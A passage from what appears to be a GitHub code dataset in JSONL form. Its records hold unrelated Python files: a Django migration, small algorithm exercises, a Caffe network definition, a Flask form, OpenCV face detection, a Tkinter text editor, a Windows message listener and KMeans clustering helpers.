Regression')\r\n","repo_name":"Liwen-Xiao/Pattern_Recognization_and_Machine_Learning","sub_path":"Linear Regression/Linear regression (parsing_and_iteration).py","file_name":"Linear regression (parsing_and_iteration).py","file_ext":"py","file_size_in_byte":12843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29021580315","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport django.utils.timezone\nfrom django.db import migrations, models\n\nimport model_utils.fields\n\nimport enterprise.models\nimport enterprise.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('enterprise', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EnterpriseCustomerBrandingConfiguration',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),\n ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),\n ('logo', models.ImageField(validators=[enterprise.validators.validate_image_extension, enterprise.validators.validate_image_size], upload_to=enterprise.models.logo_path, max_length=255, blank=True, help_text='Please add only .PNG files for logo images.', null=True)),\n ('enterprise_customer', models.OneToOneField(to='enterprise.EnterpriseCustomer')),\n ],\n options={\n 'verbose_name': 'Enterprise Customer Branding',\n 'verbose_name_plural': 'Enterprise Customer Brandings',\n },\n ),\n ]\n","repo_name":"luckyjd/lms_edx","sub_path":"edx-ficus.3-3/apps/edx/venvs/edxapp/lib/python2.7/site-packages/enterprise/migrations/0002_enterprisecustomerbrandingconfiguration.py","file_name":"0002_enterprisecustomerbrandingconfiguration.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23545429081","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 09 03:47:06 2017\r\n\r\n@author: rajbhagat\r\n\r\nFor Code Jam - flipping Pan cakes\r\n\"\"\"\r\n\r\nreadfileopen=open(\"C:/Users/rajbh/Desktop/A-large.in\",'r')\r\nwritefileout=open(\"C:/Users/rajbh/Desktop/A-large.out\",'w')\r\ncaseno=0\r\nfor e in readfileopen:\r\n if caseno>0:\r\n casecount=0\r\n req=e.strip().split(' ')\r\n pancakes=list(req[0])\r\n \r\n sizeno=int(req[1])\r\n pancakeno=0\r\n for pancake in pancakes:\r\n if pancake=='-' and pancakeno<=len(pancakes)-sizeno:\r\n pani=0\r\n while pani (s0, s1), (s1, s2), (s2, s3), ...\"\n a, b = itertools.tee(iterable)\n next(b, None)\n return itertools.zip_longest(a, b)\n\n\n# Copied from https://stackoverflow.com/a/42441759\n@contextlib.contextmanager\ndef working_directory(path):\n \"\"\"Changes working directory and returns to previous on exit.\"\"\"\n prev_cwd = Path.cwd()\n os.chdir(path)\n try:\n yield\n finally:\n os.chdir(prev_cwd)\n\n\n@pytest.mark.parametrize(argnames=\"source_file_input\", argvalues=input_files, ids=idfn)\ndef test_tool(source_file_input, snapshot):\n # We assume initial_cwd to be the build directory\n initial_cwd = Path.cwd().absolute()\n\n source_file_dir = Path(source_file_input).absolute().parent\n\n # Walk up from the source file dir until the directory of this script and\n # gather all the extra args in the extra_args files found along the way\n extra_args_list = []\n extra_args_dir = source_file_dir\n while this_script_dir.parent != extra_args_dir:\n try:\n extra_args = (\n Path(extra_args_dir / \"extra_args\")\n .read_text()\n .replace(\"\\r\\n\", \"\\n\")\n .split(\"\\n\")\n )\n extra_args = list(filter(None, extra_args))\n extra_args = [\n arg.replace(\"${current_dir}\", str(extra_args_dir))\n for arg in extra_args\n ]\n extra_args_list.extend(extra_args)\n print(extra_args_list)\n except FileNotFoundError:\n pass\n extra_args_dir = extra_args_dir.parent\n\n extra_args_map = {\"\": []}\n for extra_arg_line in extra_args_list:\n split = extra_arg_line.split(\":\", 1)\n config = \"\"\n extra_arg = \"\"\n if len(split) == 2:\n config = split[0]\n extra_arg = split[1]\n elif len(split) == 1:\n extra_arg = split[0]\n else:\n assert 0, \"Impossible\"\n\n if config not in extra_args_map:\n extra_args_map[config] = []\n extra_args_map[config].append(extra_arg)\n\n print(extra_args_map)\n for config in extra_args_map:\n infix = \"immortal\"\n extra_args = extra_args_map[\"\"]\n if config != \"\":\n infix = f\"{config}.immortal\"\n extra_args.extend(extra_args_map[config])\n\n out = \"\"\n with working_directory(source_file_dir):\n command = [\n initial_cwd / \"immortalc\",\n source_file_input,\n # Use initial_cwd as build path\n \"-p\",\n initial_cwd,\n \"--stdout\",\n \"--infix\",\n infix,\n \"--force-output\",\n ] + extra_args\n print(command)\n # Call the immortalc from the directory where the source file is.\n out = check_output(command)\n\n # Parse output of immortalc\n file_content_map = {}\n iter = transformed_file_regex.finditer(out.decode(\"utf-8\"))\n for (match, next_match) in pairwise(iter):\n content_start = match.span()[1] + 1\n content_end = next_match.span()[0] if next_match is not None else len(out)\n content = out[content_start:content_end]\n file_content_map[match.group(1)] = content\n\n for file_path, content in file_content_map.items():\n path = Path(file_path)\n # Assert snapshot\n snapshot.snapshot_dir = path.parent.absolute()\n snapshot.assert_match(content, path.name)\n","repo_name":"tinysystems/ImmortalThreads","sub_path":"compiler/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"7788361344","text":"from __future__ import print_function\nimport sys\nsys.path.append(\"./python\")\nimport caffe\nfrom caffe.model_libs import *\nfrom google.protobuf import text_format\n\nimport math\nimport os\nimport shutil\nimport stat\nimport subprocess\n\n# Add extra layers on top of a \"base\" network (e.g. VGGNet or ResNet).\ndef AddExtraLayers(net, use_batchnorm=True, arm_source_layers=[], normalizations=[], lr_mult=1):\n use_relu = True\n\n # Add additional convolutional layers.\n # 320/32: 10 x 10\n from_layer = net.keys()[-1]\n\n # 320/64: 5 x 5\n out_layer = \"conv6_1\"\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 1, 0, 1, lr_mult=lr_mult)\n\n from_layer = out_layer\n out_layer = \"conv6_2\"\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 512, 3, 1, 2, lr_mult=lr_mult)\n\n arm_source_layers.reverse()\n normalizations.reverse()\n num_p = 6\n for index, layer in enumerate(arm_source_layers):\n out_layer = layer\n if normalizations:\n if normalizations[index] != -1:\n norm_name = \"{}_norm\".format(layer)\n net[norm_name] = L.Normalize(net[layer], scale_filler=dict(type=\"constant\", value=normalizations[index]),\n across_spatial=False, channel_shared=False)\n out_layer = norm_name\n arm_source_layers[index] = norm_name\n from_layer = out_layer\n out_layer = \"TL{}_{}\".format(num_p, 1)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 1, lr_mult=lr_mult)\n\n if num_p == 6:\n from_layer = out_layer\n out_layer = \"TL{}_{}\".format(num_p, 2)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 1, lr_mult=lr_mult)\n\n from_layer = out_layer\n out_layer = \"P{}\".format(num_p)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 1, lr_mult=lr_mult)\n else:\n from_layer = out_layer\n out_layer = \"TL{}_{}\".format(num_p, 2)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, False, 256, 3, 1, 1, lr_mult=lr_mult)\n\n from_layer = \"P{}\".format(num_p+1)\n out_layer = \"P{}-up\".format(num_p+1)\n DeconvBNLayerRef(net, from_layer, out_layer, use_batchnorm, False, 256, 2, 0, 2, lr_mult=lr_mult)\n\n from_layer = [\"TL{}_{}\".format(num_p, 2), \"P{}-up\".format(num_p+1)]\n out_layer = \"Elt{}\".format(num_p)\n EltwiseLayer(net, from_layer, out_layer)\n relu_name = '{}_relu'.format(out_layer)\n net[relu_name] = L.ReLU(net[out_layer], in_place=True)\n out_layer = relu_name\n\n from_layer = out_layer\n out_layer = \"P{}\".format(num_p)\n ConvBNLayer(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 1, lr_mult=lr_mult)\n\n num_p = num_p - 1\n\n return net\n\ndef AddExtraTopDownLayers(net, use_batchnorm=True, lr_mult=1):\n # odm_source_layers = ['P3', 'P4', 'P5', 'P6']\n bbox = \"cls_specific_bbox\"\n\n use_relu = True\n # 5 x 5\n # crop feature form bottom-up net\n from_layer = \"P6\"\n out_layer = \"conv6_2_crop\"\n net[out_layer] = L.CropBBox(net[from_layer], net[bbox])\n\n from_layer = out_layer\n out_layer = \"deconv6_2\"\n DeconvBNLayerRef(net, from_layer, out_layer, use_batchnorm, use_relu, 256, 3, 1, 2,\n lr_mult=lr_mult)\n\n from_layer = out_layer\n out_layer = \"deconv6_1\"\n DeconvBNLayerRef(net, from_layer, out_layer, use_batchnorm, use_relu, 1024, 1, 0, 1,\n lr_mult=lr_mult)\n\n return net\n\nif __name__ == \"__main__\":\n\n # The database file for training data. Created by data/coco/create_data.sh\n train_data = \"/home/amax/NiuChuang/data/VOCdevkit/VOC0712/lmdb/VOC0712_trainval_lmdb_test2\"\n # The database file for testing data. Created by data/coco/create_data.sh\n test_data = \"examples/coco/coco_minival_lmdb\"\n # Specify the batch sampler.\n resize_width = 320\n resize_height = 320\n resize = \"{}x{}\".format(resize_width, resize_height)\n batch_sampler = [\n {\n 'sampler': {\n },\n 'max_trials': 1,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.1,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.3,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.5,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.7,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'min_jaccard_overlap': 0.9,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n {\n 'sampler': {\n 'min_scale': 0.3,\n 'max_scale': 1.0,\n 'min_aspect_ratio': 0.5,\n 'max_aspect_ratio': 2.0,\n },\n 'sample_constraint': {\n 'max_jaccard_overlap': 1.0,\n },\n 'max_trials': 50,\n 'max_sample': 1,\n },\n ]\n train_transform_param = {\n 'mirror': True,\n 'mean_value': [104, 117, 123],\n 'force_color': True,\n 'resize_param': {\n 'prob': 1,\n 'resize_mode': P.Resize.WARP,\n 'height': resize_height,\n 'width': resize_width,\n 'interp_mode': [\n P.Resize.LINEAR,\n P.Resize.AREA,\n P.Resize.NEAREST,\n P.Resize.CUBIC,\n P.Resize.LANCZOS4,\n ],\n },\n 'distort_param': {\n 'brightness_prob': 0.5,\n 'brightness_delta': 32,\n 'contrast_prob': 0.5,\n 'contrast_lower': 0.5,\n 'contrast_upper': 1.5,\n 'hue_prob': 0.5,\n 'hue_delta': 18,\n 'saturation_prob': 0.5,\n 'saturation_lower': 0.5,\n 'saturation_upper': 1.5,\n 'random_order_prob': 0.0,\n },\n 'expand_param': {\n 'prob': 0.5,\n 'max_expand_ratio': 4.0,\n },\n 'emit_constraint': {\n 'emit_type': caffe_pb2.EmitConstraint.CENTER,\n }\n }\n test_transform_param = {\n 'mean_value': [104, 117, 123],\n 'force_color': True,\n 'resize_param': {\n 'prob': 1,\n 'resize_mode': P.Resize.WARP,\n 'height': resize_height,\n 'width': resize_width,\n 'interp_mode': [P.Resize.LINEAR],\n },\n }\n\n # If true, use batch norm for all newly added layers.\n # Currently only the non batch norm version has been tested.\n use_batchnorm = False\n lr_mult = 0\n\n # Stores LabelMapItem.\n label_map_file = \"data/VOC0712/labelmap_voc.prototxt\"\n\n # parameters for generating priors.\n # minimum dimension of input image\n # min_dim = 320\n # conv4_3 ==> 40 x 40\n # conv5_3 ==> 20 x 20\n # fc7 ==> 10 x 10\n # conv6_2 ==> 5 x 5\n arm_source_layers = ['conv4_3', 'conv5_3', 'fc7', 'conv6_2']\n odm_source_layers = ['P3', 'P4', 'P5', 'P6']\n # L2 normalize conv4_3 and conv5_3.\n normalizations = [10, 8, -1, -1]\n\n # Create train net.\n net = caffe.NetSpec()\n\n bbox_seg_data_param = {\n 'label_map_file': label_map_file,\n 'batch_sampler': batch_sampler,\n }\n kwargs = {'include': dict(phase=caffe_pb2.Phase.Value('TRAIN')),\n 'transform_param': train_transform_param}\n\n net.data, net.bbox, net.seg = L.BBoxSegData(name=\"data\", bbox_seg_data_param=bbox_seg_data_param,\n data_param=dict(batch_size=8, backend=P.Data.LMDB, source=train_data),\n ntop=3, **kwargs)\n\n net.cls_specific_bbox, net.binary_mask, net.cls = L.SelectBinary(net.bbox, net.seg, random_select=True, num_class=20, ntop=3)\n net.__setattr__('cls_silence', L.Silence(net.cls, ntop=0))\n\n VGGNetBody(net, from_layer='data', fully_conv=True, reduced=True, dilated=False, dropout=False, pool_mask=True, freeze_all=True)\n\n AddExtraLayers(net, use_batchnorm, arm_source_layers, normalizations, lr_mult=0)\n\n AddExtraTopDownLayers(net, use_batchnorm=True, lr_mult=1)\n\n DeVGGNetBodyRef(net, from_layer='deconv6_1', fully_conv=True, reduced=True, dilated=False,\n dropout=False, pool_mask=True, extra_crop_layers=[])\n\n dekwargs = {'weight_filler': dict(type='xavier'),\n 'bias_filler': dict(type='constant', value=0)}\n deparam = {'param': [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)]}\n net.seg_score = L.Deconvolution(net.derelu1_1, convolution_param=dict(num_output=2, pad=1, kernel_size=3, **dekwargs), **deparam)\n\n net.seg_loss = L.SoftmaxWithLoss(net.seg_score, net.binary_mask, loss_param=dict(ignore_label=255))\n\n with open('examples/ssd/refineNet/vgg16_refnet_seg_voc.prototxt', 'w') as f:\n f.write(str(net.to_proto()))","repo_name":"niuchuangnn/Caffe-TD","sub_path":"examples/ssd/refineNet/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43017464832","text":"from flask_wtf import FlaskForm, RecaptchaField\nfrom wtforms import IntegerField, SubmitField, SelectField\nfrom wtforms.validators import DataRequired, NumberRange\n\n\nclass SearchUsersForm(FlaskForm):\n ocupation = SelectField('Ocupación',\n choices=[('other', 'Otro'),\n ('academic/educator', 'Educador/académico'),\n ('artist', 'Artista'),\n ('clerical/admin', 'Clero'),\n ('college/grad student', 'Estudiante universitario'),\n ('customer service', 'Atencion al cliente'),\n ('doctor/health care', 'Doctor/enfermero'),\n ('executive/managerial', 'Ejecutivo'),\n ('farmer', 'Agricultor/ganadero'),\n ('homemaker', 'Ama de casa'),\n ('K-12 student', 'Estudiante K-12'),\n ('lawyer', 'Abogado'),\n ('programmer', 'Programador'),\n ('retired', 'Jubilado'),\n ('sales/marketing', 'Ventas/marketing'),\n ('scientist', 'Científico'),\n ('self-employed', 'Autónomo'),\n ('technician/engineer', 'Técnico/ingeniero'),\n ('tradesman/craftsman', 'Artesano/vendedor'),\n ('unemployed', 'Desempleado'),\n ('writer', 'Escritor')\n ],\n render_kw={\"class\": \"form-control\"})\n\n gender = SelectField('Género',\n choices=[('M', 'M'),\n ('F', 'F')],\n render_kw={\"class\": \"form-control\"})\n\n age = IntegerField(\n 'Edad',\n [\n DataRequired(),\n NumberRange(min=1, max=110)\n ],\n render_kw={\"class\": \"form-control\", \"id\": \"floatingInput\"}\n )\n\n number = IntegerField(\n 'Número de usuarios',\n [\n DataRequired(),\n NumberRange(min=1, max=100)\n ],\n render_kw={\"class\": \"form-control\", \"id\": \"floatingInput\"}\n )\n\n recaptcha = RecaptchaField()\n submit = SubmitField('Buscar',\n render_kw={\"class\": \"btn btn-success mt-2\"})\n","repo_name":"sergiogr0702/ProyectoRecomendaciones","sub_path":"forms/SearchUsersForm.py","file_name":"SearchUsersForm.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30526116274","text":"\"\"\"\nYou have a map that marks the location of a treasure island. Some of the map area has jagged rocks and dangerous reefs.\nOther areas are safe to sail in. There are other explorers trying to find the treasure. So you must figure out a\nshortest route to the treasure island.\n\nAssume the map area is a two dimensional grid, represented by a matrix of characters. You must start from the top-left\ncorner of the map and can move one block up, down, left or right at a time. The treasure island is marked as X in a\nblock of the matrix. X will not be at the top-left corner. Any block with dangerous rocks or reefs will be marked as\nD. You must not enter dangerous blocks. You cannot leave the map area. Other areas O are safe to sail in.\nThe top-left corner is always safe. Output the minimum number of steps to get to the treasure.\n\"\"\"\nfrom collections import deque\n\ntreasure_map = [['O', 'O', 'O', 'O'],\n ['D', 'O', 'D', 'O'],\n ['O', 'O', 'O', 'O'],\n ['X', 'D', 'D', 'O']]\n\n##############\nrows = len(treasure_map)\ncols = len(treasure_map[0])\n\n\ndef get_treasure_coords():\n for i, row in enumerate(treasure_map):\n for j, ch in enumerate(row):\n if ch == 'X':\n return j, i\n\n\ndef is_position_valid(position):\n x, y = position\n if x < 0 or x >= cols:\n return False\n if y < 0 or y >= rows:\n return False\n if treasure_map[y][x] == 'D':\n return False\n return True\n\n\nmoving_directions = ((-1, 0), (1, 0), (0, -1), (0, 1))\ntreasure_pos = get_treasure_coords()\n\nvisited_positions = set()\n\nqueue = deque()\nqueue.append((0, 0))\nparents = {}\n\n\ndef bfs(current_pos):\n print(current_pos)\n visited_positions.add(current_pos)\n for direction in moving_directions:\n move_position = (current_pos[0] + direction[0], current_pos[1] + direction[1])\n if move_position == treasure_pos:\n l = deque([current_pos, move_position])\n while current_pos in parents:\n l.appendleft(parents[current_pos])\n current_pos = parents[current_pos]\n return l\n if move_position not in visited_positions and is_position_valid(move_position):\n parents[move_position] = current_pos\n queue.append(move_position)\n\n\nwhile True:\n result = bfs(queue.popleft())\n if result is not None:\n print(result) # deque([(0, 0), (1, 0), (1, 1), (1, 2), (0, 2), (0, 3)])\n break\n if not queue:\n print('Impossible :(')\n break\n","repo_name":"pedrovhb/algoz","sub_path":"traversals/treasure_island.py","file_name":"treasure_island.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30924529485","text":"from repository.base import DailyRepoBase\n\n\nclass CaseReportRepository(DailyRepoBase):\n def __init__(self):\n self.collection = self.db['CaseDaily']\n\n def new_case_per_population(self, countries, from_date):\n r = self.collection.aggregate([\n {\"$match\": {\n \"country\": {\"$in\": countries},\n \"reported_at\": {\"$gte\": from_date}}\n },\n {\"$lookup\": {\n \"from\": \"Countries\",\n \"localField\": \"country\",\n \"foreignField\": \"country\",\n \"as\": \"country_info\"}\n },\n {\"$project\": {\"new_cases\": 1,\n \"reported_at\": 1,\n \"country\": 1,\n \"pop\": {\"$divide\": [{\"$first\": \"$country_info.population\"}, self.population_per_million]}}\n },\n {\"$addFields\": {\n \"new_case_per_pop\": {\"$divide\": [\"$new_cases\", \"$pop\"]}}\n },\n {\"$sort\": {\"_id\": -1}}\n ])\n return r\n","repo_name":"miladtavakoli/coronameter","sub_path":"repository/newcase_daily.py","file_name":"newcase_daily.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7435309480","text":"#진법, 구할숫자갯수, 참가인원, 순서\ndef solution(n, t, m, p): \n answer = ''\n \n #현재 숫자\n now = 0\n #변환진수 남은 숫자갯수\n counter = 1\n #순서\n order = p\n \n def change(num, n) :\n numbers = '0123456789ABCDEF'\n result = ''\n if num == 0 :\n return '0'\n while num > 0 :\n result = numbers[num%n] +result\n num = num // n\n \n return result\n \n now_num = '0'\n while t > 0 :\n counter -=1\n order -=1\n \n if order == 0 :\n answer += now_num[len(now_num)-counter-1]\n order = m\n t -=1\n \n if counter == 0 :\n now +=1\n now_num = change(now, n)\n counter = len(now_num)\n \n return answer","repo_name":"jaehyun230/Baekjoon_Algorithm","sub_path":"프로그래머스/lv2/17687. [3차] n진수 게임/[3차] n진수 게임.py","file_name":"[3차] n진수 게임.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74428633155","text":"import polars as pl\nimport declafe.pl.feature_gen as fg\n\n\ndef test_round_n_feature():\n df = pl.DataFrame({\"a\": [1.234, -2.345, 3.456, -4.567, 5.678]})\n round = fg.col(\"a\").round_n(2)\n\n assert round(df).series_equal(\n pl.Series(\n \"round2(a)\",\n [1.23, -2.35, 3.46, -4.57, 5.68],\n ))\n\n abs_round2 = fg.col(\"a\").abs().round_n(2)\n assert abs_round2(df).series_equal(\n pl.Series(\n \"round2(|a|)\",\n [1.23, 2.35, 3.46, 4.57, 5.68],\n ))\n","repo_name":"kazchimo/declafe","sub_path":"tests/pl/feature_gen/unary/test_round_n_feature.py","file_name":"test_round_n_feature.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35401942961","text":"import tkinter as tk\nimport logging\nlogging.basicConfig(level=logging.CRITICAL)\nfrom tkinter import filedialog\n\nclass TextEditor:\n def __init__(self, master):\n self.master = master\n master.title(\"TextEditor\")\n\n self.text = tk.Text(master)\n self.text.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n scrollbar = tk.Scrollbar(master)\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n\n self.text.config(yscrollcommand=scrollbar.set)\n scrollbar.config(command=self.text.yview)\n\n self.open_button = tk.Button(master, text=\"Open\", command=self.open_file)\n self.open_button.pack(side=tk.RIGHT)\n\n self.save_button = tk.Button(master, text=\"Save\", command=self.save)\n self.save_button.pack(side=tk.LEFT)\n\n self.search_label = tk.Label(master, text=\"Search:\")\n self.search_label.pack(side=tk.TOP)\n\n self.search_entry = tk.Entry(master)\n self.search_entry.pack(side=tk.TOP)\n\n self.search_button = tk.Button(master, text=\"Search\", command=self.search)\n self.search_button.pack(side=tk.TOP)\n\n self.replace_label = tk.Label(master, text=\"Replace:\")\n self.replace_label.pack(side=tk.TOP)\n\n self.replace_entry = tk.Entry(master)\n self.replace_entry.pack(side=tk.TOP)\n\n self.replace_button = tk.Button(master, text=\"Replace\", command=self.replace)\n self.replace_button.pack(side=tk.TOP)\n\n self.text.bind(\"\", self.select_all)\n\n def save(self):\n file_path = filedialog.asksaveasfilename(defaultextension='.txt')\n with open(file_path, 'w') as file:\n file.write(self.text.get('1.0', tk.END))\n\n def open_file(self):\n file_path = filedialog.askopenfilename()\n if file_path:\n with open(file_path, 'r') as file:\n self.text.delete('1.0', tk.END)\n self.text.insert('1.0', file.read())\n\n def select_all(self, event):\n self.text.tag_add(tk.SEL, '1.0', tk.END)\n return 'break'\n\n def search(self):\n search_string = self.search_entry.get()\n if search_string:\n start = '1.0'\n while True:\n start = self.text.search(search_string, start, tk.END)\n if not start:\n break\n end = f\"{start}+{len(search_string)}c\"\n self.text.tag_add(\"highlight\", start, end)\n start = end\n\n def replace(self):\n search_string = self.search_entry.get()\n replace_string = self.replace_entry.get()\n if search_string and replace_string:\n content = self.text.get('1.0', tk.END)\n new_content = content.replace(search_string, replace_string)\n self.text.delete('1.0', tk.END)\n self.text.insert('1.0', new_content)\n\nroot = tk.Tk()\neditor = TextEditor(root)\nroot.mainloop()\n\n","repo_name":"dmcys/pytextditor","sub_path":"textditor.py","file_name":"textditor.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6555991577","text":"import cv2\nimport sys\nimport os\n\nimages = []\nfor filename in os.listdir(\"pic\"):\n img = cv2.imread(os.path.join(\"pic\",filename))\n if img is not None:\n images.append(img)\n\n# Get user supplied values\n#imagePath = \"pic/IMG-20190603-WA0007.jpg\"\ncascPath = \"haarcascade_frontalface_default.xml\"\n\n# Create the haar cascade\nfaceCascade = cv2.CascadeClassifier(cascPath)\nfor im in images:\n # Read the image\n image = im #cv2.imread(imagePath)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Detect faces in the image\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags = cv2.CASCADE_SCALE_IMAGE\n )\n\n #print(\"Found {0} faces!\".format(len(faces)))\n\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow(\"Faces found\", image)\n cv2.waitKey(0)\n","repo_name":"Abdelrahman-Hanafy/FaceReg","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74685786115","text":"import subprocess\nimport win32con, win32api, win32gui, ctypes, ctypes.wintypes, threading, pyautogui as pag\nfrom queue import Queue\nfrom Misc.MyFunctions import readFromQueue\n\nqueue = Queue(1)\n\n\ndef thread(thread1, q):\n global data\n data = []\n\n class COPYDATASTRUCT(ctypes.Structure):\n _fields_ = [\n ('dwData', ctypes.wintypes.LPARAM),\n ('cbData', ctypes.wintypes.DWORD),\n ('lpData', ctypes.c_void_p)\n ]\n\n PCOPYDATASTRUCT = ctypes.POINTER(COPYDATASTRUCT)\n\n class Listener:\n def __init__(self):\n message_map = {\n win32con.WM_COPYDATA: self.OnCopyData\n }\n wc = win32gui.WNDCLASS()\n wc.lpfnWndProc = message_map\n wc.lpszClassName = 'MyPythonWindowClass'\n hinst = wc.hInstance = win32api.GetModuleHandle(None)\n classAtom = win32gui.RegisterClass(wc)\n self.hwnd = win32gui.CreateWindow(\n classAtom,\n \"win32gui test\",\n 0,\n 0,\n 0,\n win32con.CW_USEDEFAULT,\n win32con.CW_USEDEFAULT,\n 0,\n 0,\n hinst,\n None\n )\n print(self.hwnd)\n\n def OnCopyData(self, hwnd, msg, wparam, lparam):\n pCDS = ctypes.cast(lparam, PCOPYDATASTRUCT)\n data = ctypes.wstring_at(pCDS.contents.lpData), wparam\n q.queue.clear()\n q.put(data, False)\n\n l = Listener()\n win32gui.PumpMessages()\n\n\napi = threading.Thread(target=thread, args=(\"Thread-1\", queue))\napi.start()\n\nsubprocess.Popen(\"C:\\\\Program Files (x86)\\\\Dolphin\\\\GuideConnect\\\\Guide.EXE\")\n\ndata = readFromQueue(queue)\n\ni = 0\nwhile i < 10:\n data = readFromQueue(queue)\n pag.sleep(2)\n print(data)\n","repo_name":"k13aker/guideautomation","sub_path":"Misc/debug/forloop.py","file_name":"forloop.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1163405067","text":"import numpy as np\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.metrics import davies_bouldin_score\nfrom sklearn.preprocessing import StandardScaler\nfrom concurrent.futures import ProcessPoolExecutor, as_completed\nfrom tqdm import tqdm\nfrom joblib import load\nfrom crispy import CRISP, CRISPNonU\nfrom crispy.spectral import interp_fine\n\ndef db_score(min_k, max_k, ss):\n \"\"\"\n Calculates the Davies-bouldin score for a range of cluster numbers for a specific set of standardised data.\n\n Parameters\n ----------\n min_k : int\n The minimum number of clusters to try.\n max_k : int\n The maximum number of clusters to try.\n ss : numpy.ndarray\n The standardised data to be clusetered (should be of shape (n_samples, n_features)).\n\n Returns\n -------\n dbs : list\n A list of the Davies-bouldin scores for each of the number of clusters in the cluster range.\n \"\"\"\n\n cluster_range = range(min_k, max_k+1)\n dbs = []\n\n for k in cluster_range:\n km = KMeans(n_clusters=k, n_jobs=-1)\n l = km.fit_predict(ss)\n dbs.append(davies_bouldin_score(ss, l))\n\n return dbs\n\ndef kmeans_predict(data, model, nonu=False):\n \"\"\"\n A function to use the pretrained KMeans model to predict cluster labels for standardised spectra.\n\n Parameters\n ----------\n data : str or crispy.CRISP or crispy.CRISPNonU\n The path to the data or the data object itself which is to be clustered.\n model : str or sklearn.cluster.KMeans\n The path to the KMeans model or the model itself.\n nonu : bool, optional\n Whether or not the wavelengths of the spectra are sampled non-uniformly. Default is False, it is sampled uniformly.\n\n Returns\n -------\n labels : numpy.ndarray\n An array of the cluster labels for each point reshaped to be the same dimensions as the input image.\n \"\"\"\n if type(data) == str:\n if not nonu:\n data = CRISP(data)\n else:\n data = CRISPNonU(data)\n \n if type(model) == str:\n model = load(model)\n\n wavels = data.wvls\n interp_wavels, interp_spec = interp_fine(wavels, data.data[...], pts=model.cluster_centers_.shape[-1])\n\n spectra = 